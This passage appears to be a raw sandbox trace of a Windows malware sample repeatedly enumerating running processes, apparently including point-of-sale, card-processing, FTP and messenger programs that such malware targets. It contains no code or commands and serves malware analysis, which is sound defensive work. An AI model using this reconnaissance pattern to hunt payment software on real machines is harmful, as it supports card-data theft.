[0233.815] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0233.824] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0233.826] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0233.828] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0233.830] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0233.831] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0233.833] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0233.835] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0233.837] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0233.839] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0233.840] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0233.842] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0233.844] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0233.846] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0233.847] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0233.849] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0233.852] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0233.854] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0233.856] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0233.858] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0233.864] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0233.866] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0233.868] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0233.869] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0233.871] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0233.873] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.875] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0233.877] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0233.878] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0233.880] Process32Next (in: hSnapshot=0x222c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0233.881] CloseHandle (hObject=0x222c) returned 1 [0233.882] Sleep (dwMilliseconds=0x64) [0233.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2220 [0234.007] Process32First (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.009] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.011] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.014] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.016] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.019] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.021] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.025] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.027] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.029] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.031] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.079] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.081] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.083] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.085] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.089] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.091] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.093] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.095] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.098] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.101] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0234.103] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.106] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0234.108] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.111] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0234.113] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0234.116] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0234.175] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0234.177] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0234.179] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0234.186] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.188] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.190] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0234.191] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.193] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.195] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.196] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.198] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.200] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0234.202] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0234.204] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0234.206] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0234.207] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0234.209] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0234.211] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0234.250] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0234.253] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0234.255] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0234.256] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0234.258] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0234.260] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0234.262] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0234.264] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0234.265] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0234.270] Process32Next (in: hSnapshot=0x2220, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 